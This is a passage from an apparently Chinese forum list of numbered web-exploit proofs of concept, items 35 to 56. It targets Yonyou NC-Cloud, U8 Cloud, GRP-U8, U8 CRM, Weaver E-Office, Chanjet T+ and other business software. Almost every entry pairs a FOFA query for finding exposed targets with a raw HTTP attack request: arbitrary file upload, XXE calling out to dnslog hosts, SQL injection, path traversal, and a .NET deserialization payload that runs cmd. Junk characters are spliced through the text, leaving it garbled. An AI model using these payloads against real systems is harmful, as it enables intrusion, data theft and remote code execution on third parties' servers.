1 u) J9 y3 \" wConnection: keep-alive2 q' a Y- `8 D. K7 e2 ]- X* b9 R, {% f
* R* D6 n; c7 v8 w' F1 o2 g7 l
7 B, p) O) k, z- f$ T* V4 E
35. 用友NC-Cloud importhttpscer任意文件上传0 \1 \8 h; x8 s- U' [4 Q2 B7 n
FOFA:app="用友-NC-Cloud"& Q# c- n& B9 ]; j) g3 n' A
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
& ^3 ?, d1 o; w; _! f" GHost: 203.25.218.166:8888
- r& h* Q% s) q# `. j; `1 l c) QUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info$ }( T% G; F# g; ^5 x$ ^& j k
Accept-Encoding: gzip, deflate
/ R. b7 m- W7 D8 b$ j Q9 D9 hAccept: */*% C" |3 Z6 @. `% ?8 M5 b- |! q
Connection: close# r" G. z0 H" K0 G
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA% l# }, _0 K. L1 F3 c
Content-Length: 190 |2 Q+ [. a7 z8 ]) @9 |, o
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0! z, A! {- A( ?# C
/ s7 x- E+ g. G; x# A9 Q# S6 x6 j--fd28cb44e829ed1c197ec3bc71748df04 ?/ V! b. K4 u
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"* k5 `4 C) G) Z# x1 j/ F
5 x1 T6 @0 r. x! u" i/ i<%out.println(1111*1111);%>
$ U2 K/ I" R/ d# D# b; D6 ^$ _. V--fd28cb44e829ed1c197ec3bc71748df0--
# t6 ~2 x$ X% A7 R+ ]0 |3 Y$ F
$ f; S9 i; u. V% Q+ c/ K/ o
6 ~8 b" ?" k/ C* S36. 用友NC-Cloud soapFormat XXE5 L8 O! i5 O' s' _
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"$ n) b5 A- C6 \, T4 N
POST /uapws/soapFormat.ajax HTTP/1.1
, ^3 ^/ T9 t8 j6 a/ N2 y, t3 RHost: 192.168.40.130:89898 \% M) X. S) b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0& D. ^3 T5 ~# @& a: j
Content-Length: 2639 N, s: m N6 q# M! e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" c: {( ^" ^) J
Accept-Encoding: gzip, deflate; ~* I* J6 G& k: E y3 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# X D/ p8 A2 l& k! H! X! L3 C% AConnection: close, W$ A! S9 B! c2 X
Content-Type: application/x-www-form-urlencoded! Y/ X* h6 x3 c
Upgrade-Insecure-Requests: 1
* B/ w+ p \7 i" l+ L
) T* j" }9 k, Ymsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
7 E! }$ [( p8 B2 v# e+ x
7 N+ `7 _7 r3 }
4 v) G% w' I: t) j' F1 o37. 用友NC-Cloud IUpdateService XXE
2 |" z$ D8 w0 F, @% }; e! Y( [, nFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
# G" |9 |! V( c& }% f7 S' VPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1, F& j: O- L4 K
Host: 192.168.40.130:8989
& z8 W/ L3 P7 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
7 d7 F9 }0 R) j0 \Content-Length: 421
: m* K' `- s e1 a: _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
; \% ^8 r! H3 D A& u) ?Accept-Encoding: gzip, deflate
) B/ a7 p/ P3 \2 l# OAccept-Language: zh-CN,zh;q=0.9
* r" c5 r7 j5 P: ~6 }/ {- @3 b8 _Connection: close
- Q( f8 S% v- X! b+ }& NContent-Type: text/xml;charset=UTF-8
% G' W' n |0 Q+ S3 F+ a8 gSOAPAction: urn:getResult1 h" Q; Z- s# b
Upgrade-Insecure-Requests: 1
1 ~: { G& Y" k2 r. _% b
) |! p4 J. H4 v9 G* s/ Y0 T |/ Q<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
0 k* A# D& D" M( ~<soapenv:Header/>
7 o( R! ~7 F* M+ G/ H0 i( n<soapenv:Body>
: [# d) M* M3 O+ V1 _# `<iup:getResult>: |+ m$ w: Z. C# f$ b
<!--type: string-->
4 i+ X3 w6 q+ s8 m b/ ?<iup:string><![CDATA[
5 b, F& b- J; H/ q. L/ C<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>( { t9 P2 p# |; J
<xxx/>]]></iup:string>6 n; Q' { _$ ]- ~# R! X
</iup:getResult>
1 _% D( t3 O% H) j2 z% \</soapenv:Body>% K. H& {2 Z. c4 ^# j7 Q. O
</soapenv:Envelope>
5 `, X2 p/ E" D
+ {) w7 W+ `. }# c3 X9 U: J3 z$ w% T3 X8 z7 Y- N4 C s0 s
/ c$ L& B: H6 l) F8 l38. 用友U8 Cloud smartweb2.RPC.d XXE
- Z, U; E) M% SFOFA:app="用友-U8-Cloud"3 L3 j2 o, E) }2 @2 v9 k" W2 X
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1- J* H0 ~. r: m3 q4 ]7 l7 M$ \
Host: 192.168.40.131:80889 f' J; J' `* O; E6 K$ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25" \3 n# ~7 l; _6 s
Content-Length: 260" |' a) o7 J1 W( C q, ?* w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b34 d+ q. @ r/ Q" N# D) J! Y5 d, F+ {
Accept-Encoding: gzip, deflate
6 H9 c. w% F8 @9 s3 [. L/ a0 D( RAccept-Language: zh-CN,zh;q=0.9$ E+ K1 u' D7 V
Connection: close
0 F) h" N! ~; u' r; ~7 LContent-Type: application/x-www-form-urlencoded/ r" P0 ~/ f! f2 z
0 F' r$ |6 h) s0 ___viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>3 u/ y6 T3 c3 t* D" L7 D+ }
% E* v, Z2 l* w6 {, Z
, `6 }7 z) f' L ], M) V- j' |39. 用友U8 Cloud RegisterServlet SQL注入' L( z, d4 {" |. L& k/ c8 N" @
FOFA:title="u8c"
) u& h$ P/ q5 e; J% HPOST /servlet/RegisterServlet HTTP/1.17 g" y; a2 K; T* U/ `& ]
Host: 192.168.86.128:8089
! _, t8 j$ ^) ~3 [0 \4 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
- W A0 J, Y, K1 m+ `Connection: close
! k) h: q) x/ Y5 x; e# M4 B, MContent-Length: 85
- ~. v) c6 r' j% `0 JAccept: */*
6 r0 k5 a# d$ }& D/ O8 ]Accept-Language: en6 {9 Z0 X3 G+ U$ o4 X1 A# N
Content-Type: application/x-www-form-urlencoded
1 N# K5 R! e) vX-Forwarded-For: 127.0.0.1
X, a3 }" L* Q& Y! xAccept-Encoding: gzip
9 j5 P% J1 h) i) @) x) M$ {
B$ j2 \- X8 r$ Cusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
' w# z* ]0 i9 n5 M& ]
9 G+ g0 F: H# R. x. Z/ r$ m
3 B1 M/ m4 C7 G% x4 F# Y40. 用友U8-Cloud XChangeServlet XXE, }. Z9 {) D$ x2 g9 S, Y. V P* ^
FOFA:app="用友-U8-Cloud"7 h* m, s' H7 T a; \; a& F
POST /service/XChangeServlet HTTP/1.1$ F4 r2 s+ Z% k
Host: x.x.x.x/ A8 t+ A" I8 I( W6 B# V
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 Y& a: x5 C7 j- c# }; W1 O& \5 `- SContent-Type: text/xml
8 d* D% B( V2 f+ j: ^0 GConnection: close
3 t* B" f+ B3 b: u' @. Z2 K( [$ _' ~( U" J6 o& D- a
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
. {; w5 [, f/ J1 A
+ t- d6 n9 v- ]2 {
- [7 }; Q7 K0 a41. 用友U8 Cloud MeasureQueryByToolAction SQL注入& N4 `5 s9 P8 {# f7 _* p& I; c0 i
FOFA:app="用友-U8-Cloud"3 {: e1 }, k6 b9 f% C A C
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
& q0 c( r) f, A" w( ^. N4 oHost:
R) r" d; ^* P# [2 `1 W. N0 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% R) `2 @! @% _. sContent-Type: application/json7 c n5 g5 d7 F A4 U
Accept-Encoding: gzip
2 @7 ]+ r: U4 [1 E; R; |$ O jConnection: close1 [6 U+ A, g# I8 b* V, o
8 m/ B" k% K6 v. J8 \2 |5 D0 B% y3 V
* K7 }, z6 k( S9 x9 ~1 M' m
42. 用友GRP-U8 SmartUpload01 文件上传
/ i7 q/ o, ?" M- ^FOFA:app="用友-GRP-U8"- x- _# c( v+ {2 Y/ N; ]6 q
POST /u8qx/SmartUpload01.jsp HTTP/1.1. c9 D5 [ ^( Y3 O2 w
Host: x.x.x.x
$ {" E3 \: o. r' G2 X; z' O+ hContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt2 @* Q$ W) \& N7 h6 L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
( m% \/ n2 F' q
8 e' A. X# o x( c% S$ [2 ePAYLOAD4 M* K: y" L; ^- u4 n% S$ K+ l
4 ^: p' x) f' \- e; q1 W1 U5 ]" y' S
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
7 v4 m1 Z1 g. R/ c9 _9 @
2 p. e3 b; f) T7 z% o; M43. 用友GRP-U8 userInfoWeb SQL注入致RCE- Y1 ?' n0 x* R; v
FOFA:app="用友-GRP-U8"
. r" }, r* M @" yPOST /services/userInfoWeb HTTP/1.1
2 N$ Y- ~/ W! Y, U5 A# g4 NHost: your-ip6 n* L0 B7 L8 j, e6 |- u, e
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.361 Z& h6 s% F( U* A7 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
" z2 z4 e b- aAccept-Encoding: gzip, deflate4 l2 H. j& u( c( _
Accept-Language: zh-CN,zh;q=0.9' s3 O. V' y+ W* y1 W
Connection: close
( `0 L. R1 ]; B; w9 K1 }4 {' {SOAPAction:
/ I, g- W3 |& V* M" T$ B/ H- CContent-Type: text/xml;charset=UTF-88 W! A7 `5 z4 r) w3 H2 R# _" H1 c L
' `, G* z) ?% U9 R( E0 `* M
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 T! {; {7 c' p' e5 l <soapenv:Header/>4 @: h; E: g; t
<soapenv:Body>/ _+ J& e! L/ |2 ^% \
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
/ X- i7 U; l. ?6 q <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
7 J; S( e, b. Q4 X3 l0 U </ser:getUserNameById>- a1 N0 a$ y- i( B m
</soapenv:Body>' H' f3 I# D0 u3 |' R' b
</soapenv:Envelope>$ }% j1 m( `% L ^0 a* I1 s* i w
/ d6 a; d+ G* f% X( b3 l
) n' `, h# u5 O44. 用友GRP-U8 bx_dj_check.jsp SQL注入
y/ i% b% j& ~! X0 o9 p( ZFOFA:app="用友-GRP-U8"
% `- v" K) V; vGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
+ J5 y3 L) V! x0 P2 [Host: your-ip
' m. \: F# ]$ I# jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
3 I2 s) ?# p6 W! n- e1 }) i+ a4 ^4 EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% o0 {3 K* i: }, x; n4 K2 G- x0 A
Accept-Encoding: gzip, deflate C+ I% H- S1 Y
Accept-Language: zh-CN,zh;q=0.9
% J1 {; }( C7 r3 G$ r" w* NConnection: close1 N2 b7 t! O9 k
: l1 ^4 O4 v5 S3 d; H
' C! ]" S" V. G3 o5 x! [8 O0 Q# u45. 用友GRP-U8 ufgovbank XXE
5 z" f- y/ l$ w5 S& o, V5 I: g$ b9 S. ZFOFA:app="用友-GRP-U8"
& C; G8 N; C" J `( y' OPOST /ufgovbank HTTP/1.11 f, N8 R% y# f. H. ?6 @
Host: 192.168.40.130:222
2 l& a6 ]2 b, [; V0 \# xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0, ?- J, K5 j; x) p' W
Connection: close
$ T+ j' B0 H4 ]- F1 U& n# p' K( UContent-Length: 161
+ C6 ^6 T5 @8 T" N) ]5 v5 U8 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ d) F$ X# [4 o$ g# G4 \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' S/ c7 E# m8 e6 T
Content-Type: application/x-www-form-urlencoded% e" h5 Z! @4 X0 {3 _, c: y( @0 ]
Accept-Encoding: gzip
! D6 g2 y t$ i. M
3 z$ i3 M N/ X. o, w) nreqData=<?xml version="1.0"?>
, H/ h/ ^& x! M<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
% E) c/ {) ^. n6 I5 N) g! }2 v) ?6 P/ t
5 U, s9 ?6 H! V: k46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) y' K: l! M, G# a' lFOFA:app="用友-GRP-U8". ]8 c, @/ B5 Z1 H
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.11 a" @1 ~& i. }0 p `9 E. ~
Host: your-ip
) ^8 B) j5 d8 N, }# p) `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
% W2 \* _/ b* n' i+ q# q; nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( ~$ o( N4 F# Y% Q- |5 S! O' X) |Accept-Encoding: gzip, deflate" h, o# b2 {( d& \5 R
Accept-Language: zh-CN,zh;q=0.9% J% d) w$ E/ ^) D( o$ I# q
Connection: close/ g8 s% F, Y$ c9 a. u
( d& o' J0 a/ Q' \3 _- [! i
, g4 J- g% L" T" w5 e8 K `+ N
47. 用友GRP A++Cloud 政府财务云 任意文件读取
3 m7 o! [7 @; GFOFA:body="/pf/portal/login/css/fonts/style.css": y* `. u4 y! @8 b
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1 V6 E! _, \ @! f9 B
Host: x.x.x.x! G, u% |% J9 O5 `4 D, n
Cache-Control: max-age=0
, x9 u+ n4 x# l Q r% V. L/ F wUpgrade-Insecure-Requests: 1+ X6 O) ^! Y" f, ~7 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) Q0 _6 p% ^! w) q4 p% kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% u2 |0 k$ U9 ~9 P* h
Accept-Encoding: gzip, deflate, br0 ?/ `* J" M; j7 A( @
Accept-Language: zh-CN,zh;q=0.9
! Z, N' q: s$ J! HIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT' y S+ Z* J) N( E8 {
Connection: close5 B5 s5 t: y! y& E. B/ ?; t
5 o/ g5 X' Y9 ?8 f; O3 Q7 m2 L7 q0 Z, ^. D3 h
& z% G6 z, U. p0 L48. 用友U8 CRM swfupload 任意文件上传
4 R/ p e) n1 P' `* cFOFA:title="用友U8CRM"
; |7 H/ u8 T/ `3 oPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
, K8 T( A( d. yHost: your-ip
$ o: J* P9 V; G4 h+ b, a+ o: J4 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 I0 a, b3 d; O4 d0 j# d$ c& |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 i; S; w' m+ R% }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' ?' O; E0 V2 f5 E9 q8 Q* R, i; i
Accept-Encoding: gzip, deflate
; W: F/ q4 ^( g' _2 bContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
, |6 o0 m% v3 j3 d9 e$ r------269520967239406871642430066855
6 T2 B4 b0 Z5 b' V! [, `* e* eContent-Disposition: form-data; name="file"; filename="s.php", c0 T6 v2 Q0 h2 J0 |" J& c
1231
6 y! p- `4 X+ n2 n% q x# CContent-Type: application/octet-stream( j8 C s2 Z. z- Q# r) w7 Y; H- M
------269520967239406871642430066855
" p: R4 ` S( CContent-Disposition: form-data; name="upload"2 e9 O6 D" u6 }* C1 j. M5 ^3 W7 j4 E3 d
upload
) L/ p1 ?2 ~& m$ H G G------269520967239406871642430066855--
% O) h) g& @; R( V
8 a D5 m$ P5 c C" @. y# w- @- {5 O4 U, O, y( _% l' d) `8 a' `/ u. ^
49. 用友U8 CRM系统uploadfile.php接口任意文件上传+ G j% X8 A- L1 g5 I" O
FOFA:body="用友U8CRM"
8 c) ?, U5 u0 d% l1 L2 D( n+ b& t% W+ _
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
. J* \8 s4 Z0 f- {Host: x.x.x.x
/ @, O2 d# ^/ \$ I0 |, sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! [/ O( \9 B, ?$ o' LContent-Length: 329
. ]" R, D% T6 M* B% a; R) sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ ^" g' l! L* _Accept-Encoding: gzip, deflate3 B, i* _$ R, N: j; m5 p& p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 R$ W- {1 r$ ~* JConnection: close
' Z& k/ q9 H5 \: u5 bContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w% r2 `& n+ \" F& P
9 B1 k; [" Y' K. g6 }- {
-----------------------------vvv3wdayqv3yppdxvn3w
3 v" a3 |5 b7 f( `Content-Disposition: form-data; name="file"; filename="%s.php "
! f) Q7 r+ a3 |# b) @( ~Content-Type: application/octet-stream
5 ?: C' m" k1 \" m8 y3 f0 _0 [
0 M! K6 q) N4 v% _$ y* r# jwersqqmlumloqa& \. [4 n6 k' T+ @
-----------------------------vvv3wdayqv3yppdxvn3w4 d2 Z; V/ D9 P/ ^& L
Content-Disposition: form-data; name="upload"
8 {5 K" j, t, C ]$ G0 h8 I2 l. E+ \. @8 @) J+ `2 _
upload( K* r) r" v* i* Q/ _
-----------------------------vvv3wdayqv3yppdxvn3w--+ v2 ~& e* Z) K* e8 A
; E1 ]2 M: S& [9 z$ H4 y. X: v
: g7 f- m0 x2 Q, c$ R/ Khttp://x.x.x.x/tmpfile/updB3CB.tmp.php' M' F8 |2 L8 x: C
9 v7 T3 M S1 K; m+ S
50. QDocs Smart School 6.4.1 filterRecords SQL注入+ D- C; t2 Q9 \
FOFA:body="close closebtnmodal"
! A, j* L" U* C* F/ \2 [% V2 ]POST /course/filterRecords/ HTTP/1.1" {. D; o1 G" u- W
Host: x.x.x.x
8 @8 B7 u1 ?8 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. _' w: \2 C! {5 f8 K
Connection: close- _: W& F/ M* E. W+ w/ z* Q& l
Content-Length: 224
% N' Y5 X. a, vAccept: */*" M P9 l# J h6 }: }8 R
Accept-Language: en) e( }, d3 c3 Y
Content-Type: application/x-www-form-urlencoded
1 [: x8 e5 x: S- M8 MAccept-Encoding: gzip
3 o. c: C9 q4 z4 ?' i2 h5 n" s, x( \
+ F3 k( e' G' O1 y( s) g2 Esearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
% Q: b+ K* _3 K L
. {; ^% r* u, _9 w
) L7 z" K# s* [51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
7 F- ^2 g* f/ hFOFA:app="云时空社会化商业ERP系统"
( \1 u T# n J; v, ZGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1# d" k4 l! D9 h7 I: r
Host: your-ip
o/ D1 B8 A, @' B- @: PUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
4 ]( g4 W) Z' DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& p, ?$ x' _& ]& R( O. D; yAccept-Encoding: gzip, deflate
& u( w" l% o$ @5 m' Q; O2 l+ f" YAccept-Language: zh-CN,zh;q=0.9
5 Q1 y' H( ?, o* |# X% b/ VConnection: close
) X2 {( E" n( q* V/ _" `5 H
+ j* m" O% m" M7 t; t! q4 T) q, K
. ?2 s/ p! Z& l1 i. v0 ^" b52. 泛微E-Office json_common.php sql注入* O% z c9 [& m7 z
FOFA:app="泛微-EOffice"7 H* n9 B! Z6 x* S% C, a5 ]
POST /building/json_common.php HTTP/1.1
/ m6 r0 O: X5 K6 [Host: 192.168.86.128:8097/ f& e o) {! \& J6 {! ~& p: H6 C
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% n) E& ^( n9 c5 C
Connection: close d1 n7 q6 q5 R- v6 o
Content-Length: 87
) K4 @3 V8 o' rAccept: */*
0 J& `. ]3 N! r8 ^* l8 e; z) lAccept-Language: en5 P- T+ g( b4 X3 `# f2 K
Content-Type: application/x-www-form-urlencoded4 G) P% x {" v5 W/ X2 X* H7 m
Accept-Encoding: gzip
4 k6 F8 k1 K4 B+ M. T* O5 S i$ H. E& h
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
, w3 I$ v, O6 L
( l5 U$ {9 @0 l9 `' I. \3 e
0 q! {, e6 K$ S53. 迪普 DPTech VPN Service 任意文件上传7 C( X3 w6 C( \
FOFA:app="DPtech-SSLVPN"
6 M+ n/ u0 M# e, R) U/ R' @6 P/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd! v0 p( L5 V y3 E( F. S
: T7 e2 Y4 n8 ]; ]
/ M* F8 Y3 s8 V6 q9 c) C9 m. \54. 畅捷通T+ getstorewarehousebystore 远程代码执行
: E% \; K$ L% [ j' [! hFOFA:app="畅捷通-TPlus"
Q$ |- H, F, a8 O1 U第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
( P) r5 I! D* S) u" s' U+ x"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"; H* n3 n+ q* _* c9 B; W3 i
2 U- K _" Q" S& K
$ |& w5 J+ ]) l8 [, h
完整数据包$ s' C; t: x: h$ v+ Q# u4 _5 H! F
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1$ O3 I4 K7 y$ G: Z
Host: x.x.x.x6 _8 N% h9 s, l2 `" u% I
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F% b" m! P: }) F( m9 ^0 _5 p
Content-Length: 593
s5 N3 Z8 e! T& J
% ^7 J1 g# A1 M6 }{3 l4 T- e* ~2 D( d6 A5 r" y
"storeID":{6 z- v' j. Z5 ~# _
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",! y4 x* R$ J4 w
"MethodName":"Start",3 I+ m$ `% W* v! H. m
"ObjectInstance":{! U) ^. m! }$ d S2 s# | X
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
* A0 ~" i7 N5 r9 o* }$ e7 B "StartInfo":{4 X, x$ ]$ q) u% O
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
p8 Y; R, d% b8 M "FileName":"cmd",6 c- E/ b, ]7 B8 f% [1 l
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
1 L) i5 [+ M9 v: h }
4 B8 G3 c8 Y3 i" v& e }
( G! T' ~( p* _ }
: M0 b( U- m3 a9 c: [5 E}
2 q4 x! g( P" p! ~3 f4 r4 n
# M& _* U+ k4 [ S, y8 W6 y/ o
3 h8 j; n/ U" ]: y0 r! d第二步,访问如下url: `" J$ ]/ i4 r- B7 z
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt+ Y. o! f. B% s' l- I- m
$ v& y* l p( }! _ Y. i4 |) l* d; u- A5 l6 @
55. 畅捷通T+ getdecallusers信息泄露0 z7 b& E5 a. Z9 {- V$ G* s
FOFA:app="畅捷通-TPlus"
5 ~2 f6 u$ p/ g) B o8 j, n第一步,通过6 \) D" V5 P" H5 J; C7 T
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie( [% Z3 d/ v5 e
第二步,利用获取到的Cookie请求
$ ~7 Q! z0 I" h8 h- ~: t8 I/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
. W4 L6 w: E F: l- X' s; }
4 d9 d* l* R$ I, |; V, X2 N& f, p' B8 b56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
) ?7 V9 f2 e7 xFOFA: app="畅捷通-TPlus"( E" `- ]* u+ J
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
